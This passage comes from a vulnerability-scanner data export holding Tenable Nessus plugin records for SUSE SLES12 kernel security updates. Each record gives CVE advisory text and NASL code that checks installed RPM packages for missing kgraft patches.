cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_55-52_42-default-2-2.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_55-52_42-xen-2-2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:32", "description": "This update for the Linux Kernel 3.12.44-52_18 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-02T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2014-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "modified": "2016-09-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_44-52_18-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_44-52_18-default"], "id": "SUSE_SU-2016-2014-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93283", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2014-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93283);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2015-8816\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-3134\", \"CVE-2016-4470\", \"CVE-2016-4565\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2014-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.44-52_18 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980856\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980883\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-7446/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0758/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1583/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2053/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4470/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4565/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162014-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?29c556b8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1177=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1177=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_44-52_18-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_44-52_18-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_44-52_18-default-6-2.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_44-52_18-xen-6-2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:28", "description": "This update for the Linux Kernel 3.12.51-52_34 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-02T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2002-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "modified": "2016-09-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_34-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_34-default"], "id": "SUSE_SU-2016-2002-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93276", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2002-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93276);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2015-8816\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-3134\", \"CVE-2016-4470\", \"CVE-2016-4565\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2002-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.51-52_34 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980856\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980883\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-7446/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0758/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1583/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2053/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4470/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4565/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162002-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?664c10b2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1190=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1190=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_34-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_34-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_51-52_34-default-5-2.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_51-52_34-xen-5-2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:28", "description": "This update for the Linux Kernel 3.12.55-52_45 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-02T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2001-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2053", "CVE-2016-0758", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "modified": "2016-09-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_45-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_55-52_45-default"], "id": "SUSE_SU-2016-2001-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2001-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93275);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2015-8816\", \"CVE-2016-0758\", \"CVE-2016-2053\", \"CVE-2016-3134\", \"CVE-2016-4470\", \"CVE-2016-4565\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2001-1)\");\n 